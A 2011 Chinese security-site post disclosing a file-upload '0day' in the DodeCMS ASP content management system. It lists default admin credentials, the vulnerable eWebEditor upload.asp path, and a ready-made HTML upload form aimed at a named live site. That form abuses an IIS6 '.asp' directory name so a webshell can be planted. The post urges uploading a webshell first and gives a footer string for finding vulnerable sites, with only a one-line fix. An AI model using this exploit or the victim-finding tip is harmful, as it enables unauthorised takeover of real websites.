首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
DodeCMS成创网站内容管理系统 上传漏洞0day
来源:vfocus.net 作者:vfocus 发布时间:2011-03-21  

DodeCMS成创网站内容管理系统由辽宁成创网络科技有限公司基于微软ASP、通用ACCESS数据库开发完成;
访问模式采用动态模式,基本上实现了系统的自定义功能,代码简洁高效,易于修改维护,可扩展性强。

默认后台路径:admin/
默认后台用户名密码 admin
官方网站:http://www.dodecms.com/

前提: IIS6.0+asp环境

漏洞文件:admin/eWebEditor/asp/upload.asp 代码略,成因略。(想知道自己百度)

利用代码:

<form action="http://www.hackqing.com/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

有图有真像(建议先传小马):


测试:
Powered by DodeCMS

多的自己找关键词。天朝法令不允许。自己悠着点。

修补:
增加验证\更改路径\或直接删除。

By:Mr.DzY,由情整理编辑

 

测试报告:Powered by DodeCMSV1.1 测试目标http://www.6hl.net/bug.txt       

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·IIS7.0畸形解析漏洞通杀0day
·快客电邮(QuarkMail)远程命令执
·freetextbox编辑器0day
·防注入程序拿shell
·Symantec LiveUpdate Administra
·Discuz!后台拿Webshell 0day
·建站之星SiteStar V2.0 上传漏洞
·蓝科企业网站管理系统中英繁版V1
·DedeCMS. 织梦科技注入爆管理员
·boblog任意变量覆盖漏洞(二)
·乔客(joekoe) CMS 4.0 上传与SQL
·5U CMS v1.2.2024 SQL注入漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved